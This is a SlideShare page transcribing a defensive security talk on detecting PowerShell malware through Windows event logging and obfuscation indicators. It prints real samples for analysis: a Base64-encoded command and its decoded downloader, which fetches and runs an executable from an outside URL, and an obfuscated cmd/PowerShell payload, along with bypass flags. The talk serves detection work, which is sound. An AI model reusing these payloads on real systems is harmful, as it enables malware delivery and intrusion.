Michael Gough, profile picture
Uploaded byMichael Gough
PDF, PPTX858 views

BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1

This PowerShell command uses many odd characters and variable names to obfuscate its intent, which is typically seen with malware. It likely downloads additional payloads or malware to the system. Logging and monitoring PowerShell activity can help detect this type of obfuscated command.

Embed presentation

Download as PDF, PPTX
PowerShell post-exploitation, PowerSploit, Bloodhound, PowerShellMafia, Obfuscation, and PowerShell Empire, the Empire has fallen, you CAN detect PowerShell exploitation Michael Gough MalwareArchaeology.com MalwareArchaeology.com
Who am I • Blue Team Defender Ninja, Malware Archaeologist, Logoholic • I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How Creator of “Windows Logging Cheat Sheet”, “Windows File Auditing Cheat Sheet” “Windows Registry Auditing Cheat Sheet”, “Windows Splunk Logging Cheat Sheet” “Windows PowerShell Logging Cheat Sheet”, “Malware Management Framework” And just released “Windows Advanced Auditing Cheat Sheet” • Co-Creator of “Log-MD” – Log Malicious Discovery Tool – With @Boettcherpwned – Brakeing Down Security PodCast • Co-host of “Brakeing Down Incident Response” podcast • @HackerHurricane also my Blog MalwareArchaeology.com
The Challenge MalwareArchaeology.com
PowerShell Exploitation • Malware loves to use PowerShell to download and launch payloads – They try and hide it too • Red Teamers love PowerShell – They love to hide too – It is already built into the OS • But they DO make noise and CAN be detected – If you know how MalwareArchaeology.com
So where do we start? MalwareArchaeology.com
Check Your Settings MalwareArchaeology.com
What is set? What version? • What version PowerShell you running? • Is PowerShell logging enabled? • Are you using a PS v2 profile.ps1 to set logging? • What is your Execution Policy? • How can you check? MalwareArchaeology.com
Audit with LOG-MD MalwareArchaeology.com
Audit with LOG-MD • We give you a report MalwareArchaeology.com
Enable Logging MalwareArchaeology.com
PowerShell has Logs! • You MUST enable them, not configured by default ;-( • “Windows Logging Cheat Sheet” (CMD LINE) • “Windows PowerShell Logging Cheat Sheet” – Follow the guidance – MalwareArchaeology.comcheat-sheets • Module Logging • ScriptBlock Logging • Transcripts if you want • Profile.ps1 for PS v2 – nop (no Profile) will bypass this ;-( MalwareArchaeology.com
PLEASE UPGRADE • For the love of NOT getting pwned… • Upgrade to PowerShell v5 • FYI – PS v6 is out and renamed the binary to pwsh.exe • So update all the queries to look for BOTH PowerShell and Pwsh • PS 5 & 6 has logging that can’t be bypassed as easily like v2, 3 and 4 with the –nop (NoProfile) MalwareArchaeology.com
Typical Malware MalwareArchaeology.com
What is Malware Using? • LOTS of PowerShell – In most, if not all malware we see – Hearing it a lot in targeted attacks – Living off the land, all the files are already there – Just add script/commands and run • PenTesters, The RED TEAM also loves them • There are LOTS of PS post-exploit kits • You will hear the term “Non-Malware” attacks MalwareArchaeology.com
Exploit Kits • PowerSploit • PowerShellEmpire • EmpireProject • BloodHound • PSRecon • PowerShell-Suite • PowerTools • Powershell-C2 • PSAttack • And more… MalwareArchaeology.com
4688 – PowerShell Bypass In the Security Log MalwareArchaeology.com
They do this to hide what you see • 4688 will capture this behavior • Stops profile.ps1 from loading in case there is any logging set inside it, hide the window, and ignore any execution policies • YAY Microsoft.. Allows built-in bypasses • LOTS of way to spell the bypasses MalwareArchaeology.com
PowerShell Bypasses • -W Hidden (Hide the window YOU see) • -NoP –sta –NonI –w hidden (no Profile, Hidden, Non-Interactive) MalwareArchaeology.com
Security Log - 4688 PowerShell Web Calls MalwareArchaeology.com
Fetch !!! • The malicious payload must phone home to get the dropper • System.Net.WebClient • DownloadString and/or http • -Enc or Encoded • There are lots of ways to spell PS commands ;-( MalwareArchaeology.com
Base64 Encoded • New way to hide from the “Process Command Line” 4688 event – No bypass words to check for… Silly hackers… It is still easy to spot • POWeRshEll -enCodedCOMmaNd – ZgB1AG4AYwB0AGkAbwBuACAAaQBlAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHM AdwBzAGUAZgAgACgAIAAkAFgARABKAFEAaABXAGYAcQBWAHUAWABvAFIASQAgACwAIAAkAHMAYgBUAGYA TwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH MAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpA GwAZQAoACAAJABYAEQASgBRAGgAVwBmAHEAVgB1AFgAbwBSAEkAIAAsACAAJABzAGIAVABmAE8AVAB0AG 0ASgBzAGkARQBZAFYAWQB4ACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZ QBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIA AkAHMAYgBUAGYATwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgB rAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEgAWQBs AFoAYgBVAFcAZwBGAHYAUABZAGkAZwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAn AFwASwBkAG0ATwBiAFEAWgBWAEIAeQBRAHAAdgBCAFMAUQBpAHoAcAAuAGUAeABlACcAOwANAAoAaQB lAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHMAdwBzAGUAZgAgACcAaAB0AHQAcA BzADoALwAvAGMAbwBtAGYAeQAuAG0AbwBlAC8AeQBiAG4AdwBpAGYALgBqAHAAZwAnACAAJABIAFkAbAB aAGIAVQBXAGcARgB2AFAAWQBpAGcAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= MalwareArchaeology.com
Manual Translation • On a website MalwareArchaeology.com
PowerShell Log - 4104 Module Logging MalwareArchaeology.com
Translated… Fetch • function ieWLdWAwtHiFdfCSOsMbswsef ( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx ){(New-Object System.Net.WebClient).DownloadFile( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx );(New-Object -com Shell.Application).ShellExecute( $sbTfOTtmJsiEYVYx ); } • try{ • kill -processname EXCEL; • $HYlZbUWgFvPYig=$env:USERPROFILE+'KdmObQZVByQpvBSQizp.exe'; • ieWLdWAwtHiFdfCSOsMbswsef 'https://comfy.moe/ybnwif.jpg' $HYlZbUWgFvPYig; • }catch{} • Catch it as a PS 4104, not a Process Create 4688 MalwareArchaeology.com
PowerShell Decodes for you !!! • 4104 event will decode any –Encoded, Base64 blobs • Module Load MalwareArchaeology.com
Security Log – 4688 PowerShell Log – 4104 Windows PowerShell Log - 400 Obfuscation MalwareArchaeology.com
Fetch !!! • They will try to hide or obfuscate their behavior to make it hard to read • To me, this makes no difference, except I can’t easily understand what they are doing • They will add plus“+” to add/connect variables • They will use ticks ‘ or ^ carats to break word checks • They will use dollar $ or percent % to designate variables • So look for the Odd Characters that indicate obfuscation! – You can thank Daniel Bohannon for this shtuff MalwareArchaeology.com
Obfuscation – Odd stuff - 4688 • Becomes obvious very quickly.. This is BAD MalwareArchaeology.com Ticks Plus +
Obfuscation – Odd stuff - 4104 • Now you can’t look for words, so adapt MalwareArchaeology.com Lots of special characters, some normal for PS
Even older PowerShell v2 Event ID 400 • Look for odd characters • Count of characters are very telling once isolated or extracted from the blob MalwareArchaeology.com
4688 - Process Create Security Log MalwareArchaeology.com
Typical Malware launching PowerShell 1. User launches MS Word 1. Calls CMD.exe 1. Calls PowerShell and downloads dropper 1. Calls Malware 1. Calls 2nd copy of Malware MalwareArchaeology.com
This PowerShell looks odd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAUQB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1ADMAMQBiADkAMQAzADUAYwBiAD EAZAA2ADMAMgA5AGIANABhADQAZQA1ADUAZgA1ADMAZQA4ADYAZQBiADgAYQAyAGUAZgA3ADYANABkAGUANQBjADMAMQA3AGQAZgA5ADcAZABjAGUANwA4AGMAZAA4AD kAOAA0ADAAOQA4ADgANAA2AGUAYgA0ADAAMQA3ADUAYgA5AGMANwAwAGEANgA3ADIANQAyADEANgBmADQAZQA3ADcAZgA4ADMAMABkAGMAOABhAGQAOQA2AGIAZQAx AGMAZQBhADYAMwAxAGUAMQAzAGEANQA0ADgAYwBmADMAMQA1ADgANAAyADEAOABiAGQAOABjADAAOAAzAGUAOQA3ADIAYwA4AGIAZgBhADAAMQA1ADkAYQBjAGMAN ABlAGUAMABlAGUAMQBjADcAZQBhADMAZQBlAGEAMQBlADkANABkADYAOAAzAGEAYQA3ADcAMQBiADQAYwA5AGUANgBkAGMAYQBmADkANAA5ADYAMgBiADYAYwBkADMA OQA3ADEAZgA1AGYAYwBjADAAZQBiAGQAOAAzADQAOAA4AGMAZQA3AGMAZABjAGIAYQBiAGYAZAA4ADgAOQBiADgAOAAyADcANwAwADcANAA0ADIAZAAyADMAZQAwADMAO QBlADUANQA1ADUAMQBiADUAZgAxADgAOAA1ADcANgA5ADMANABkADkANAAzADUANwAzADgAOQA3ADAAMABiAGUAMwBiAGYAMwA1ADEAMQBiAGEANgBiADYAYgAwADUA NQAxAGUANAA3ADUAMgBjAGUANAA4ADgAYQBiADYAMQA3ADUAOQBkADEAZQA1ADUANAA3ADUANwA2ADYAOABlADgANwBmAGMAMQAzADQANwBmAGEANgA4AGUAMwA0 ADAANwBmADAANQBiADkANwAyAGEANAA3ADIAZAA3AGIAMgAxADYAYwBmADAAMwA0ADYAYwA2ADYAYgAxADkAMQA3AGUAYgA0ADkAOABiADUANgAyADgAMQBmADQAYgA 2ADYAMQAyAGMAOQAxAGEAOQA5AGEANQBiADcAYgBhAGQAYgA1ADgAZQBiAGMAZgA4AGEAMQA2ADAANgAzADkAMwBjAGIAMgA4ADcANwA3ADIANAAxADcANgAwADEAZQA2 AGQAMwBiAGYAMgBhADEAMQAxADMAYQAyAGUAOQBmADIAYgA4AGUAZQA0ADUAMwBmAGYAYwAzAGIAMABiAGMAYwAyADYANQBmADcAMgAzAGUAYgBmAGQAYgA1ADQA OAAwADEANAA3ADcAZgAyAGQAZAA4AGUAYgBhAGYAOQA1ADMAMgA5AGEANgA2ADQANwAwAGUANwAzADMAZQBlADgAMgBjAGEAYwAzAGQAOQBhADQAYQA4ADAAMgAwA GQAOABkAGMANwAxADAANQA5ADEAYwBkAGIAYgA4ADMANgAwADYAZQBkAGYAMAA4ADgAMwBmADUANABhAGYAOABmADgANQAyADAAMQA4ADYAYwAxADMAMQBiADkAZ gA4AGIAZQAzADQAZgA5AGYAMQBkADcAOQA4AGIAZgAxADcAOAAxADMAOAA5ADEANQAxAGQAYQBjADIAYwAxADcAMAAwADEANwAzADgAMQA4ADgAMgA0ADMAMwBmADMA ZQBkADUAMAA4ADYAYQBiADIAYgAxAGEAYgA3ADMAMAAxADAAMABhADIAYwA1AGYAZgA0ADkAYgBiADkANwBjAGMANwBkADgAMQAzADUAMAAxADAAZQBmAGEAMQAyADQA OQBhAGMAMQBkAGYAZgBjAGEAZgBiADYAMAA2ADUAOABhAGYANwAzADEAOQAzADEAZQBhADUANwA4AGMAYQBmADEANwAxADEAOAA1ADgANgA0ADkANABjADYAMABkAGU AYgA2AGUAMQBlAGIAMgA5ADkAYQAwADAANgA1ADAANgAxADYANgBkADUAYwA2AGIAYgAyAGYAMAA0ADYAYgBlADAANwA1AGQAOQAxADcAOABmAGMAOAA2ADEAMQA4ADc AMAA3ADcAYwA0AGUAYgA2AGIAOQAyADMAYgBhADgAMQBlADAAOQA3ADgANgBkAGIAYwA4ADEAMgA2ADQAZgA5AGMAOQAwAGYAZAAwADQAYQBkAGUAOAA1ADkAZQBlAD UANwA2ADgANAA4ADkANQBiADgAMgAzADMAMgAwAGUAYgA1ADMANQBiAGUANAA5AGMAYgA4ADAAYQA4AGQANABiAGEAMwA1ADQAMwBhADAAMQA3AGYAYwAwADMAY wA3ADEAYwAyADQAZQBlAGMAOQBmADkAMgA0AGMAYQAyAGMANgA2AGQAOABlADQAOAA5ADUAMwBjADQAZABkADIAZQA2ADQAYQAzADgANAAxADcAOABmAGMAMABhAG QANgAyADIANwA4ADQAYQA2AGYANABiADgAMQA4ADcAYgAwADgAZABmADgAMQA0AGMAYwBhADcAYgBlAGEAOQAyADcAMgBiADcAOAAxADkAMQBiADcAZAAwADUANgA0AG QAMwAzAGYAMQBjADgAOQBiAGUAZQA3ADgAZAAxAGIANwA1AGMAMQA2ADIAOQAyADMAMAA3ADcAZgA4ADEAZAAyADQAZABkAGUANwBlAGYANAA1ADAANABkADUAMgAxA DEANgAxADgAZQBjAGUAMwBlADUAMQAyADgANABlADEANwA4ADYAZABlADIAMgA5ADAAYgAwADYANAA2ADAAZQA2ADIAMQBlADQAYwA5ADAAZAA0ADgAOAA4ADgANgA5ADc ANAA2ADMAYwBjADIAOABlADYAYwBiADYAMwA2AGUAMAAxADEAZgA2AGMAYgAzAGUANwBjADIAMABmADcANgAwADgAMgA4AGYAZAA5ADgAOQBjADMAZgBiAGUAYgA4ADkA MQA4AGIANwA2ADYAYgBhAGMAMQA4ADUAMAAwADMAMQAyADEAYQA2ADUAMQBhADQANABlADAAMQA5AGYAZQAxADcAZgBjADIANQBjADgANgA3ADUAOQA0ADIANwA4AD cAYgA1ADUAYgA0ADAANAA0ADkAMgBhAGMAZQBmAGEAZAAwAGEAZQBjAGIAMQBkAGEAMwAzADEAMABlADMAOQAyADAAZABkADMAMQA1ADQAMgA4ADEAMABlADQAZgAx AGIAZAAyADkAZgA2ADIAMwBkADAAMgBjAGQAYgBlADYAMgBkADEAYwBjADMAMwBhADUANgA2AGIAMQA1ADMAYwA3ADMANQA4AGEAYwAyADkAOAA3AGUANQBmAGYAOAA 3ADMAZQA1AGMAOQBkAGQAYwBiADcAMQA1ADAANwAwAGUAYwAwAGIANAA3ADQANwAwADMAMAA2ADEAOQAxADcAOAA0AGUANQA4ADgANgBlADAANQA3AGQANwAxAGI ANAAyAGQANgA2ADUAOQA0ADkAMAA1ADkANQBkADQAZgBhAGUANAAzADUANQA4ADQAMwBkAGIAMwBhAGQAZgA5ADEAYgA3ADcAMABhADMAYQA2AGUAYQAwADkANwAx AGMAYQA3AGIANAAwADkANgA2AGYAMQA1ADcANQA1AGMAYQA3AGYAMQA2AGIANgAyADAAMAA4ADEAYgAwADcAZQBhADUAYQBjAGQAOQBhADUAZgAzAGMANQBiADIANQA yADQAOAA2ADgANwA0ADgANgAyADIAYwAxADQAYgBlADgAZAA3ADUANAA5AGQAZQA5ADkAMAAwADkANwBjADcAMABkAGQAMgBiADcAMABiADEAYwBjADAANgBkADIAYgA4A DYAMQAyADUAMgA2ADgAMAA0AGEAYQBlAGMANAAxADUAZQAxADEAOAAzADgAZgA0ADIAMgA3ADEAYQBiAGYAOABhADAAMgBiADkANwA0ADMAOQAwAGQAMgA2ADMAYwB kADYAYQA4ADAANgA1ADgAMgBlAGEANwA3AGQAMQAwADQAYQBhAGQAOABlADgANQBlAGMAZQA1ADAAZABkAGIANQAwAGEAYgBmAGMAOAAzADAAMwBlADUAMgBiADYAY wBiAGMAMwBjADAAZAAzADEAZQBiAGMAYwAxAGMAMgBjADAAMwAzADEAMgAzAGYAYwBkAGMANgA1AGMANwA0AGUANQA4ADYAMQA5AGYAZAA0ADgAMQA3AGUANQA4A DUANwBlADgAZQAxAGUAOQA1AGMAZgBjAGQAMwBkADMAZgBmADgAMwBjADEAMAA4ADgANAA5ADMAYwBmADAAMAAzADUAYwBkADEAZAAxADkAMAAxADYANgA4ADgAMQ A5AGIAOQBiADkAMwAzADUAMgA4ADAAOAAxAGQAZQBkAGEAYwA0ADIAMwBiADUANAAwADQAMgAzADMANwBlAGEAZQA4ADgAMgAwADEAYQAyAGQAMAA2AGYAZQA3ADYA YQAwADEANQBjAGUAZQA5ADAAMABkAGMAMAA2AGIAZQBhADAANwBiADQAMQBjADAAZQAyAGUAOQAyADAAZgAyAGUAYgBmADQANAA0ADIAZAA2AGYAOAAwAGUAYQA3AD kANwA1ADcAOABjADUANgA0ADAANgAwAGYAYgA0ADUANwBjAGYAOAAxADUAOAA1AGUAZAA5ADEANABjADAAMAAyADcAOAA5ADIAZQBiAGQAMABlADUAMAA2ADkAZAAyADc AMwAxAGEAOAA4ADcAZQA1AGIAMAAzADcAYgBiAGQAMABjAGYAOAA0ADQAYQAyADEANwA0ADAAYgA2AGMAMgA4ADMAOQAxAGIAOQBmADMANgBlADQAMABjADAAMQA1A DYAYgA4ADQAMwA5AGMANwBhADYANABhAGUAYgA3ADUAZgBmAGYAMgBhADAAYQBiAGQAZQA3ADUAZgBiADMAMQA4ADcAMQA5AGYAZAAyADkAZAAxAGMANQA3AGEAYgA wADcANAA2AGUAMQA1ADEAYQBlAGMAZgAwAGMAZAA0ADQAYgAwAGQAMwA2ADAAMQBhAGEAYQA4ADkAZgBhADEAMwBjADAANQA3ADgANgAyAGQAMQAxAGIAZgA2AGMA NQBhADkAOABhADIAOAA0AGEANgBhADIAYgBkAGYAYQBhAGUANwA0AGYAOQBjADAAZABkADMAYwBiADAAZgBjAGIAMgAyADUAMgBiADEAZgA1ADcAMQAxAGEAYwAxAGMANw A3ADIANQAxADgAOAAxAGUAYQAxAGQAZQBkADAAMQA3ADEAZAAwADcANQA0ADcAMAAxADIANgAzADcAMgBiADcANwBkADgAMQAyAGQAYgBiAGEAZAA4ADEAZgAzADgAZABk ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
This PowerShell looks odd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAU QB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1 ADMAMQBiADkAMQAzADUAYwBiAD – 42 more lines of Script Block code • ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
Did that look normal? • 4688 will show you the Process execution – What called what • What called PowerShell, and the parents above – Word > CMD > PowerShell = Always BAD • What did PowerShell logging catch? – That big blob looked interesting MalwareArchaeology.com
4104 - PowerShell Script Block Logging Microsoft-Windows-PowerShell/Operational Log MalwareArchaeology.com
Script Blocks are labeled MalwareArchaeology.com
Then you will see this in the logs • It is not translated, just recorded • But they are LARGE – You can trigger on say > 1000 characters – You can see this one will also trigger Obfuscation MalwareArchaeology.com
This is a normal Script Block MalwareArchaeology.com
Do they look the same? MalwareArchaeology.com Readable NOT Readable Obfuscated
And they obfuscate MalwareArchaeology.com Ticks Plus +
4104 - PowerShell Module Logging Microsoft-Windows-PowerShell/Operational Log MalwareArchaeology.com
WARNING !!!! MalwareArchaeology.com • PowerShell does have a WARNING if something is odd • Trigger Alerts on these too • 4104
WARNING !!!! • The Remote Command along with all this… = BAD MalwareArchaeology.com
WARNING !!!! • And the raw log MalwareArchaeology.com
WARNING !!!! • And you can see translation in Event ID 4100 MalwareArchaeology.com
WARNING !!!! • And you can see translation in Event ID 4100 MalwareArchaeology.com
4100 – Executing Pipeline • Can see some translation occurring MalwareArchaeology.com I can read this NOT this
PS v2 - 500 Events • Windows PowerShell MalwareArchaeology.com
PS v2 200 Events • Command Health MalwareArchaeology.com
Whitelisting PowerShell In the Logs MalwareArchaeology.com
Filtering out the good, to find the bad • PLEASE put a Mark/Sign/Secret Key in your scripts MalwareArchaeology.com
Code your PowerShell for exclusion • Make the scripts excludable on obvious things YOU or your company does or knows • The path is awesome – All scripts excluded by path alone • Names, Secret Code, Key – Have your scripts contain something only you know that is a ‘secret key’ to exclude by • Or.. Sign your PS scripts MalwareArchaeology.com
Once you create these queries MalwareArchaeology.com
Create Email Alerts • Trigger on PS launching • Tweak and filter out known good – Get your developers to mark their code!! MalwareArchaeology.com
PowerShell Log Goodness • Enable the logs per the Cheat Sheets • PS v2 Logs (even if you have PS v5) – Collect Event ID 200, 400, and 500 – Windows PowerShell • PS v5 v6 Logs (maybe v4 if you hack it) – Collect 4100, 4104 – Microsoft-Windows-PowerShell/Operational • Windows Logs – Collect 4688 – WITH Process Command Line MalwareArchaeology.com
Security Log Event ID - 4688 • PS executed • PS Bypass executed • PS Suspicious buzzwords • PS Count Obfuscation Characters (‘ + $ % ;) • You can look for large Scripts Blocks and Base64, but use the PS logs for this MalwareArchaeology.com
PowerShell v2 • 200 – Command Health – WARNING, will give you some translation • 400 – Engine Lifecycle – What executed • 500 – Command Lifecycle - What executed and the command line if using profile.ps1 – and if “No Profile” (-nop) is not bypassed MalwareArchaeology.com
PowerShell v2 Event IDs - 200 and/or 400 • PS Web Call • PS Count Obfuscation Chars (‘ + $ % ;) • PS ScriptBlock size (> 1000) • PS Base64 blocks • PS WARNINGS MalwareArchaeology.com
PowerShell v5 & v6 • 4100 – Executing Pipeline - WARNING • 4104 – Execute a Remote Command – WARNING and Verbose • No Obfuscation here, stripped out as it is executed, so you get clean code • That big Base64 blob… now it is readable MalwareArchaeology.com
PowerShell v5 & v6 Event IDs - 4100 and/or 4104 • PS Web Call • PS Suspicious Commands (buzzwords) • PS Count Obfuscation Chars (‘ + $ % ;) • PS ScriptBlock by size (> 1000) • PS Base64 blocks • PS WARNINGS MalwareArchaeology.com
Sysinternals Sysmon Service • You can catch Not-PowerShell PowerShell execution • Event ID 7 – Module loads – Look for Process that is calling System.Management.* DLLs • And all the other cool stuff Sysmon collects MalwareArchaeology.com
Summary • Enable PowerShell logging ! – Use the Cheat Sheets • LOG-MD will check your system and report – Use it to evaluate malware too • Create Reports and Alerts for the items discussed • Maybe add Sysmon on a few systems for ID 7 • Use the “Windows Splunk Logging Cheat Sheet” for some examples of what was discussed • Send us your improvements and tweaks !!!! • But START LOGGING POWERSHELL !!!! MalwareArchaeology.com
Shout Out • This is one DAMN GOOD Report • I use it in my Malicious Discovery Training • Palo Alto Networks – “Pulling Back the Curtains on EncodedCommand PowerShell Attacks” • https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the- curtains-on-encodedcommand-powershell-attacks/ • GREAT analysis on the Fu the bad guys use that will help you craft your queries and alerts • Actual spelling of the pwnage, etc. MalwareArchaeology.com
Resources • https://www.invincea.com/2017/03/powershell-exploit-analyzed-line-by-line/ List of Tools • https://github.com/emilyanncr/Windows-Post-Exploitation Obfuscation • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation- usage-guide • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation- usage-guide-part-2 • https://github.com/danielbohannon/Revoke-Obfuscation • https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke- obfuscation-report.pdf • https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the- wild.html Metasploit Check Logging module • https://github.com/darkoperator/Meterpreter-Scripts/tree/master/scripts MalwareArchaeology.com
Resources LOG-MD.COM • Websites – Log-MD.com The tool • The “Windows PowerShell Logging Cheat Sheet(s)” • All the other Cheat Sheets too – MalwareArchaeology.com
Questions? LOG-MD.COM You can find us at: • Log-MD.com • @HackerHurricane • MalwareArchaeology.com • HackerHurricane.com (blog)

More Related Content

PDF
Windows IR made easier and faster v1.0
byMichael Gough
 
PDF
The top 10 windows logs event id's used v1.0
byMichael Gough
 
PDF
You can detect PowerShell attacks
byMichael Gough
 
PDF
You need a PROcess to catch running processes and their modules_v2.0
byMichael Gough
 
PDF
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
byMichael Gough
 
PDF
Commodity malware means YOU
byMichael Gough
 
PDF
Logging for hackers SAINTCON
byMichael Gough
 
PDF
Logging for Hackers v1.0
byMichael Gough
 
Windows IR made easier and faster v1.0
byMichael Gough
 
The top 10 windows logs event id's used v1.0
byMichael Gough
 
You can detect PowerShell attacks
byMichael Gough
 
You need a PROcess to catch running processes and their modules_v2.0
byMichael Gough
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
byMichael Gough
 
Commodity malware means YOU
byMichael Gough
 
Logging for hackers SAINTCON
byMichael Gough
 
Logging for Hackers v1.0
byMichael Gough
 

What's hot

PDF
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
byMichael Gough
 
PDF
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
byMichael Gough
 
PDF
Logs, Logs, Logs - What you need to know to catch a thief
byMichael Gough
 
PDF
Windows Incident Response is hard, but doesn't have to be
byMichael Gough
 
PDF
Malware Management - HouSecCon 2014
byMichael Gough
 
PDF
InnoTech 2017_Defend_Against_Ransomware 3.0
byMichael Gough
 
PDF
DIR ISF - Email keeps getting us pwned v1.1
byMichael Gough
 
PDF
RMISC logging for hackers
byMichael Gough
 
PDF
Sandbox vs manual malware analysis v1.1
byMichael Gough
 
PDF
Logging for Hackers - What you need to know to catch them
byMichael Gough
 
PDF
Sandbox vs manual analysis v2.1
byMichael Gough
 
PDF
Detecting WMI Exploitation v1.1
byMichael Gough
 
PDF
Deeplook into apt and how to detect and defend v1.0
byMichael Gough
 
PDF
Info sec is not daunting v1.0
byMichael Gough
 
PDF
What can you do about ransomware
byMichael Gough
 
PDF
Mw arch mac_tips and tricks v1.0
byMichael Gough
 
PDF
Finding attacks with these 6 events
byMichael Gough
 
PDF
Proper logging can catch breaches like retail PoS
byMichael Gough
 
PDF
Ask a Malware Archaeologist
byMichael Gough
 
PDF
Secure Yourself, Practice what we preach - BSides Austin 2015
byMichael Gough
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
byMichael Gough
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
byMichael Gough
 
Logs, Logs, Logs - What you need to know to catch a thief
byMichael Gough
 
Windows Incident Response is hard, but doesn't have to be
byMichael Gough
 
Malware Management - HouSecCon 2014
byMichael Gough
 
InnoTech 2017_Defend_Against_Ransomware 3.0
byMichael Gough
 
DIR ISF - Email keeps getting us pwned v1.1
byMichael Gough
 
RMISC logging for hackers
byMichael Gough
 
Sandbox vs manual malware analysis v1.1
byMichael Gough
 
Logging for Hackers - What you need to know to catch them
byMichael Gough
 
Sandbox vs manual analysis v2.1
byMichael Gough
 
Detecting WMI Exploitation v1.1
byMichael Gough
 
Deeplook into apt and how to detect and defend v1.0
byMichael Gough
 
Info sec is not daunting v1.0
byMichael Gough
 
What can you do about ransomware
byMichael Gough
 
Mw arch mac_tips and tricks v1.0
byMichael Gough
 
Finding attacks with these 6 events
byMichael Gough
 
Proper logging can catch breaches like retail PoS
byMichael Gough
 
Ask a Malware Archaeologist
byMichael Gough
 
Secure Yourself, Practice what we preach - BSides Austin 2015
byMichael Gough
 

Similar to BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1

PPTX
Powering up on PowerShell - BSides Greenville 2019
byFernando Tomlinson, CISSP, MBA
 
PDF
Proper logging can catch breaches like retail PoS
byMichael Gough
 
PPTX
Bsides tampa
byOctavio Paguaga
 
PPTX
Incorporating PowerShell into your Arsenal with PS>Attack
byjaredhaight
 
PDF
BSidesPGH 2019
byBrianGardiner12
 
PDF
The Dark Side of PowerShell by George Dobrea
byEC-Council
 
PPTX
Hacked? Pray that the Attacker used PowerShell
byNikhil Mittal
 
PPTX
Powering up on power shell avengercon - 2018
byFernando Tomlinson, CISSP, MBA
 
PDF
Powering up on PowerShell - BSides Charleston - Nov 2018
byFernando Tomlinson, CISSP, MBA
 
PPTX
Catch Me If You Can: PowerShell Red vs Blue
byWill Schroeder
 
PPTX
PSConfEU - Building an Empire with PowerShell
byWill Schroeder
 
PDF
Who Should Use Powershell? You Should Use Powershell!
byBen Finke
 
PDF
2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf
bykhalil511890
 
PPTX
Building an Empire with PowerShell
byWill Schroeder
 
PDF
From P0W3R to SH3LL
byArthur Paixão
 
PPTX
Catching fileless attacks
